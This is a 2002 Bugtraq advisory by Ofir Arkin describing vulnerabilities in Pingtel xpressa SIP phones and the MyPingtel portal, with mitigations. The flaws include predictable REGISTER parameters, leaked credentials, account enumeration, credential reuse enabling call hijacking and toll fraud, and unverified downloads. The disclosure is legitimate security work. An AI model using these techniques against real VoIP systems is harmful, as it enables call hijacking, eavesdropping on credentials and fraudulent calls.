[26755] in bugtraq
More Vulnerabilities with Pingtel xpressa SIP-based IP phones
daemon@ATHENA.MIT.EDU (Ofir Arkin)
Wed Aug 21 12:26:36 2002
From: "Ofir Arkin" <ofir@sys-security.com>
To: <bugtraq@securityfocus.com>
Date: Tue, 20 Aug 2002 22:12:16 +0100
Message-ID: <004d01c2488e$487c3250$0a01a8c0@joshua>
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_004E_01C24896.AA409A50"
------=_NextPart_000_004E_01C24896.AA409A50
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: 7bit
The Sys-Security Group
Security Advisory
"More Vulnerabilities with Pingtel xpressa SIP-based IP Phones"
Release Date: 08/20/2002
Affected Platforms: Pingtel xpressa SIP IP phones model PX-1 with
software version 2.0.1 and below; Pingtel instant xpressa softphones
with software
version 2.0.1 and below
Severity: High
Author: Ofir Arkin (ofir@sys-security.com)
Summary
Pingtel (http://www.pingtel.com) develops intelligent Java-based
voice-over-IP phones and softphones for service providers and
enterprises.
Using the vulnerabilities enumerated within this advisory it is possible
to jeopardize critical telephony infrastructure based on Pingtel's
xpressa SIP-based IP phones and softphones. Additionally, certain
vulnerabilities allow an attacker to take complete control over an IP
Phone or a softphone node either directly or by circumventing other SIP
entities on the network by abusing the 'node's credentials'.
The most severe issue discussed is the way an attacker can exploit
vulnerabilities with MyPingtel Portal (http://my.pingtel.com) to subvert
a VoIP infrastructure which includes IP Phones and/or softphones from
Pingtel.
Full Details in PDF format (~500kb):
http://www.sys-security.com/archive/advisories/More_Vulnerabilities_with
_Pingtel_xpressa_Phones.pdf
Full Details in HTML format:
http://www.sys-security.com/archive/advisories/html/More_Vulnerabilities
_with_Pingtel_xpressa_Phones.htm
Moderated text version is attached to this email and available from:
http://www.sys-security.com/archive/advisories/More_Vulnerabilities_with
_Pingtel_xpressa_SIP-based_IP_phones.txt
Ofir Arkin [ofir@sys-security.com]
Founder
The Sys-Security Group
http://www.sys-security.com
PGP CC2C BE53 12C6 C9F2 87B1 B8C6 0DFA CF2D D360 43FA
For more information: http://www.sys-security.com
Copyright (c) The Sys-Security Group 2002, all rights reserved.
------=_NextPart_000_004E_01C24896.AA409A50
Content-Type: text/plain;
name="More_Vulnerabilities_with_Pingtel_xpressa_SIP-based_IP_phones.txt"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="More_Vulnerabilities_with_Pingtel_xpressa_SIP-based_IP_phones.txt"
The Sys-Security Group
Security Advisory
"More Vulnerabilities with Pingtel xpressa SIP-based IP phones"
Release Date: 08/20/2002
Affected Platforms: Pingtel xpressa SIP-based IP phones model PX-1 with =
software
version 2.0.1 and below; Pingtel instant xpressa softphones with =
software=20
version 2.0.1 and below
Severity: High
Authors: Ofir Arkin (ofir@sys-security.com)
Summary
Pingtel (http://www.pingtel.com) develops intelligent Java-based =
voice-over-IP=20
phones and softphones for service providers and enterprises.
Using the vulnerabilities enumerated within this advisory it is possible =
to=20
jeopardize critical telephony infrastructure based on Pingtel's xpressa=20
SIP-based IP phones and softphones. Additionally, certain =
vulnerabilities allow
an attacker to take complete control over an IP Phone or a softphone =
node either
directly or by circumventing other SIP entities on the network by =
abusing the=20
'node's credentials'.=20
The most severe issue discussed is the way an attacker can exploit=20
vulnerabilities with MyPingtel portal (http://my.pingtel.com) to subvert =
a VoIP
infrastructure which includes IP Phones and/or softphones from Pingtel.
Background Information
Please see the full advisory available from the Sys-Security Group's web =
site for
more information on VoIP, SIP, and SIP Registrar's.
A PDF is available from: http://www.sys-security.com/archive/advisories/
More_Vulnerabilities_with_Pingtel_xpressa_Phones.pdf
An HTML version is available from: http://www.sys-security.com/archive/
advisories/html/More_Vulnerabilities_with_Pingtel_xpressa_Phones.htm
The Vulnerabilities=20
A. Predictable Parameter Values with SIP REGISTER requests sent from =
Pingtel's=20
IP Phones
The following is a SIP REGISTER request sent from a Pingtel SIP-based IP =
Phone=20
to a SIP Registrar SERVER:
REGISTER sip:192.168.1.57 SIP/2.0
To: sip:carol@192.168.1.57
From: sip:carol@192.168.1.57;tag=3D456248
Call-ID: 8-reg@192.168.1.59
CSeq: 1 REGISTER
Contact: sip:carol@192.168.1.59
Expires: 3600
Content-Length: 0
Accept-Language: en
Supported: sip-cc, sip-cc-01, timer
User-Agent: Pingtel/1.2.6 (VxWorks)
Via: SIP/2.0/UDP 192.168.1.59
The values required to subvert a registration which are used by the =
request are
all predictable. The "Call-ID" is fixed (with another Pingtel IP phones =
it was=20
always fixed to "9-reg@myIP"), the sequence number sent is 1 (so setting =
it to=20
any higher number would be sufficient), the "To" and "From" SIP URIs are =
also=20
predictable allowing a remote attacker to circumvent the SIP Registrar =
and=20
write any bindings to the location service remotely (if no =
authentication is=20
required).
Although authentication will be required in some cases, requiring the =
attacker=20
to have the right credentials for the user before having the ability to=20
circumvent the SIP Registrar and to write false records into the =
location=20
service, there are a number of ways to extract the username and password =
from=20
a Pingtel SIP-based IP phone, some outlined in this advisory some in =
other[1].
B. Compromising VoIP infrastructure using the MyPingtel Portal
MyPingtel is a Portal (http://my.pingtel.com) for one to use and manage =
his=20
Pingtel xpressa softphone or IP phone. The MyPingtel web site can be =
used to:
"Learn about new applications and services and install them from your=20
PC. Create and manage your speed dial phone book using the PC=20
keyboard. Set your call handling preferences for call forwarding when=20
you're away from the phone and on the phone. Get tips and online help=20
for using your phone. Stay current with news from Pingtel..."
In order to use the application/Portal, a user needs to register his =
Pingtel=20
xpressa SIP-based IP phone with the MyPingtel Portal. This is done in =
two=20
stages: A user needs to register to Pingtel's Portal, and than the user =
needs=20
to register his IP phone (physically accessing the IP phone) using the =
details=20
(and credentials) he supplied when registering with Pingtel's Portal.=20
This first stage is simply accomplished by browsing to =
http://my.pingtel.com=20
and filling the required registration form[2].=20
The user's credentials supplied to Pingtel's Portal with the =
registration=20
process must be a valid username and password that allows the =
registering user=20
to login to his IP phone via the web server interface of his IP Phone.=20
The next step would be to use the MyPingtel Sign-In application, which =
is=20
supplied by default with Pingtel's IP phone and softphone, to register =
the IP=20
phone, physically accessing the phone. This is simply done by pressing:
More -> MyPingtel Sign-In -> Next -> [Enter your username] ->=20
[Enter your password] -> OK -> [Enter Admin Password] ->=20
[Enter Phone Name] -> Next -> OK
A message will be displayed confirming the registration[3].
B.1 E.T. Phones Home - Information Leakage leading to the compromise of =
the IP=20
Phone
When the IP phone (or softphone) boot-up, the IP phone will send all=20
registration information to Pingtel's MyPingtel Portal =
(http://my.pingtel.com)=20
utilizing the HTTP protocol. The information sent to Pingtel's Portal =
will=20
include the following:
- Admin name in clear text
- Admin Password in MD5 hash
- Mac Address in clear text
- Physical Password in MD5 hash
- Admin Domain in clear text
- IP Address of the IP phone in clear text
- Web Server Port in clear text
- And other information
Any malicious party able to extract this information from the wire =
(upstream=20
to Pingtel, local network to the phone, intermediate network, etc.) will =
have=20
the ability to brute force the user's password offline. This might be =
done=20
utilizing the same hashing/crypto algorithm used. A malicious party =
might=20
choose to actively brute force the password either against the IP =
phone's web=20
server or utilizing Pingtel's Portal.
The value of the information is even greater when the IP address of the =
IP=20
phone is routable from the Internet. This will allow a remote attacker =
to=20
connect to the IP phone's web server remotely (the web server access is=20
required for the operation of MyPingtel Portal) either directly or =
through=20
MyPingtel Portal using the credentials he extracted.
Although administrator access is needed to circumvent some of the IP =
phone's=20
features (the username is "admin" and the out-of-the-box password is =
clear)=20
having a valid username and password would allow a malicious party to =
circumvent
the "Call Handling" features of the IP phone, such as the various "Call=20
Forwarding" features[4].
B.2 E.T. Get's a Call - Information Leakage leading to the compromise of =
the IP
Phone
To use Pingtel's Portal one needs to supply his username and password. =
The web=20
page is composed of 2 parts. The left part contains a login page which =
is using
HTTP over SSL (HTTPS), where the right part of the page is simply a list =
of=20
application and other miscellaneous pieces of information.
B.2.1 Username and password enumeration using the http://my.pingtel.com =
Web=20
Site
The problems starts even before successfully authenticating to the web =
site=20
since the web site will be kind enough to tell you if the username =
exists or=20
not... and of course when the password is wrong...
This will allow any malicious party to actively enumerate any user ever=20
registered to MyPingtel Portal as well as his password (no account =
lockout=20
policy seems to be in place).=20
B.2.2 What a successful authentication can bring...
If the authentication to Pingtel's Portal is successful, MyPingtel =
Portal will=20
send an authentication request to the authenticated user's IP phone's =
web=20
server with the user's credentials (the same credentials used to logon =
to the=20
Portal). Since the IP Phone sent its IP address and web server port =
number,=20
among other pieces of data, to the Portal when a user registered its IP =
phone=20
to MyPingtel services (and automatically after every boot-up if no =
changes are=20
made), the Portal will have the knowledge to which IP address to send =
the=20
authentication request to.
The problem is that the Pingtel xpressa SIP-based IP Phone's (and =
softphone's)=20
web server is only able to receive (and handle) HTTP BASIC =
authentication (Base
64). Any malicious party able to extract this information from the wire=20
(downstream to Pingtel, local network to the phone, intermediate =
network, etc.)
will have the username and password of a legitimate user for that =
particular IP
phone.
The value of the information is even greater when the IP address of the =
IP=20
phone is routable from the Internet. This will allow a remote attacker =
to=20
connect to the IP phone's web server remotely (the web server access is=20
required for the operation of MyPingtel Portal) either directly or =
through=20
MyPingtel Portal using the credentials he extracted.
Although administrator access is needed to circumvent some of the IP =
phone's=20
features (the username is "admin" and the out-of-the-box password is =
clear)=20
having a valid username and password would allow a malicious party to=20
circumvent the "Call Handling" features of the IP phone, such as the =
various=20
"Call Forwarding" features[5].
C. Onto the Critical Path
With the Pingtel xpressa SIP-based IP phones and softphones there are a =
number=20
of instances where user credentials will be required to be presented, =
for=20
example:
- When a non-privileged user or an "admin" wishes to use the IP phone's
web server to manage some of the IP phone's functionality.
- When outgoing SIP requests will have to be authenticated against the=20
targeted SIP entity before the entity will be willing to process the=20
requests.=20
The Pingtel xpressa SIP-based IP phone is able to have two different =
sets of=20
credentials for any user for those scenarios. One set of user =
credentials=20
allowing a user to use the IP phone's web server, and another to =
authenticate=20
the SIP requests the IP phone will make on behalf of that user targeting =
different SIP entities within the VoIP network.=20
Unfortunately the documentation with Pingtel's xpressa SIP-based IP =
phones and=20
softphones does not make the appropriate distinction between the =
different=20
cases and does not highlight the enormous security hazards =
associated[6].
Therefore I believe that with several deployments of Pingtel's xpressa=20
SIP-based IP phones the credentials information was set the same for a =
user to=20
logon to the IP phone's web server and for authentication information =
for=20
outgoing SIP requests.=20
The same credentials used for outgoing SIP requests and for accessing =
the=20
IP phone's web server will also be those who will be provided as part of =
the=20
registration process to MyPingtel Portal. This is since a user is not =
able to=20
deploy another IP phone user unless he has the "admin" password. =
Therefore a=20
user will be limited to use his login name and password, used to login =
to the=20
IP phone's web server (and in most of the cases to authenticate outgoing =
SIP=20
requests), to register to MyPingtel Portal allowing him to be able to=20
successfully authenticate to the web server after authenticating to =
MyPingtel=20
Portal.
This will lead to the following scenario:
The authentication credentials the Pingtel xpressa SIP-based IP phone =
will be=20
required to present when it will be needed to authenticate a call =
request or a=20
registration request to a SIP entity (or entities) within the VoIP =
network the=20
Pingtel IP phone is part of, will be the same credentials used for the=20
MyPingtel Portal and the MyPingtel Sign-In application on the IP phone!.
A malicious party able to extract the credentials from the MyPingtel =
Portal,=20
using one of the methods presented within this advisory, will be able to =
pass=20
any authentication required by any SIP entity for the particular user!
The potential risk is devastating for the VoIP network where any =
authentication
required in order to block misuse of the network can now be easily =
bypassed:
- Using a user's credentials a malicious attacker will be able to=20
successfully authenticate to the SIP Registrar server and make=20
changes to the binding information stored in the location service=20
for that particular user.=20
This fault combined with the ability to predict SIP REGISTER request=20
parameters sent from Pingtel SIP-based IP Phones and softphones leads
to the total control of the binding information for a particular =
user.=20
This will allow, among other things, for a malicious party to=20
associate the user's SIP or SIPS URI with an IP address or a hostname
which do not represent the IP Phone. In other words it would allow a=20
malicious party to perform "Call Hijacking" in a very easy manner=20
even remotely!=20
- Abusing the SIP Registrar server would allow a malicious party to=20
forward incoming call requests outside of the organization using=20
Pingtel's xpressa SIP-based IP Phones which its nodes and credentials
were compromised.
- When a user places a call, he might need to provide authentication=20
information in order to be allowed to place the call. This is=20
usually performed for the user by its IP Phone where the user's=20
username and password are stored and used when needed. Since the=20
user's credentials are compromised, a malicious party will be able to
use the credentials he extracted to make free phone calls using the=20
VoIP network the Pingtel xpressa SIP-based IP phone(s) belongs to.
- Etc.
D. More Issues
There are more, less severe issues I have found with Pingtel's xpressa =
IP=20
phones and softphones which are listed below allowing people to =
understand what
they are exposed to.=20
D.1 Availability - Random Reboots of the IP Phone
Using a Pingtel xpressa SIP-based IP Phone I have encountered situations =
were=20
the IP phone have rebooted out-of-the-blue. There was no attack lunched =
on the=20
phone, and the network traffic was HTTP, HTTPS, POP3 and SMTP only.
Although this was not observed in small intervals, still the =
availability of=20
the IP phone, which is sometimes regarded as critical infrastructure, is =
at=20
risk.
I do feel it is not my role to perform various tests against the IP =
phone in=20
order to determine the exact cause of the random reboots. This is =
something I=20
save for Pingtel and WindRiver (manufactures of the VxWorks platform).
D.2 No verification of downloaded software
As part of the IP phone's boot up process the IP phone will fetch =
several JAVA=20
applications from Pingtel's web site. There are no verification checks =
against=20
the downloaded software resulting in a possibility for anyone =
circumventing DNS
records to try to "feed" the IP Phone with the wrong application =
(malicious?).=20
D.3 User Enumeration by Physically Accessing the IP phone
If physical access is gained to the phone, a malicious party will be =
able to=20
view the username one is using for his IP phone if using the MyPingtel =
Sign-In=20
application simply by pressing:
More -> MyPingtel Sign-In
If the user is using MyPingtel Sign-In application a message will be =
displayed=20
alerting the IP phone is already signed-in to MyPingtel displaying the =
current=20
signed-in login name and the server it is connected to.
This information should be hidden.
D.4 Hard coded usernames and passwords within web pages served with =
MyPingtel=20
Portal
Although the login to MyPingtel Portal is done securely using HTTPS, any =
malicious user using a workstation previously used by a legitimate =
MyPingtel=20
Portal user, will be able to, by pressing the browser's back button and =
viewing
the web page source, see in clear text, the user's username and password =
as=20
well as the IP Phone's IP address...
Temporary Solution
There are a number of risk mitigation network configurations a VoIP =
network=20
administrator might do in order to mitigate some of the risk involved =
with=20
using Pingtel's xpressa SIP-based IP phones and softphones on his =
network:
Issues related the configuration and usage of the IP phones:
- Deploy users using the IP Phone's admin GUI in a lab environment=20
BEFORE issuing the IP phone's to your users
- Change the "admin" password on the IP phones. Remember - the default=20
is blank!
- Shut down the Pingtel xpressa IP phone's web server after initial=20
setup if this function is not required or used by your users
- Configure different credentials set for each user for:
- Outgoing SIP requests that needs to be authenticated, and for
- Web Server logon for managing some of the IP phone's abilities
- Do not disclose the credentials needed to authenticate the outgoing=20
SIP requests to your users!=20
- Do not perform remote management tasks using the Pingtel xpressa IP=20
phone's web server since authentication is literally in clear text!=20
Issued related to MyPingtel Portal:
- Do not allow your users to use the MyPingtel Portal (actively block=20
this with the appropriate access controls on your network filtering=20
devices until the issues with this advisory are resolved), they can=20
directly access their Pingtel xpressa IP phone's locally. Educate=20
them how to do that!
- Do not allow your users to use the MyPingtel Sign-In application on=20
their Pingtel xpressa SIP-based IP phones (actively block this with=20
the appropriate access controls on your network filtering devices=20
until the issues with this advisories are resolved)
- Block access to http://my.pingtel.com=20
General Issues:
- Block access to your SIP Registrar server from the Internet (and from
other networks that should not access it)
- Make your VoIP network non-routable for users coming from the =
Internet
- Do not allow any access to your VoIP infrastructure from the Internet
Other type of solutions should be provided by Pingtel.
Conclusion
MyPingtel Portal does not take security into account which might lead to =
a=20
total compromise of any VoIP network using the MyPingtel Portal with =
Pingtel's=20
SIP-based IP phones and softphones. This is a direct result of the lack =
of=20
proper security centric documentation, understanding, and education on =
the part
of Pingtel.
This is another example how a new-comer technology still needs to go =
through=20
several cycles before it might be regarded as "ok" to use regarding its=20
security risks.=20
[1] Ofir Arkin & Joshua Anderson: Multiple Vulnerabilities with Pingtel =
xpressa
SIP Phones July 12, 2002. Available from: =
http://www.sys-security.com/archive/
advisories/a071202-1.txt=20
[2] Although I have previously indicated to Pingtel that the information =
entered is not validated against any record of sale or other, it is =
still=20
possible for anyone to register with completely fake information and be =
able to
receive the services from the Portal.
[3] When entering the password for the MyPingtel user, the last digit =
will be=20
displayed for ever on the instant xpressa softphones making shoulder =
surfing=20
even easier than ever before.=20
[4] Please see section C for more hazards
[5] Please see section C for more hazards.
[6] Pingtel's own "Best Practices for Deploying Pingtel phones" document =
(http://www.pingtel.com/docs/best_practices_20x.txt) does not address =
this=20
issue.
For more information: http://www.sys-security.com
Copyright (c) The Sys-Security Group 2002, all rights reserved
------=_NextPart_000_004E_01C24896.AA409A50--
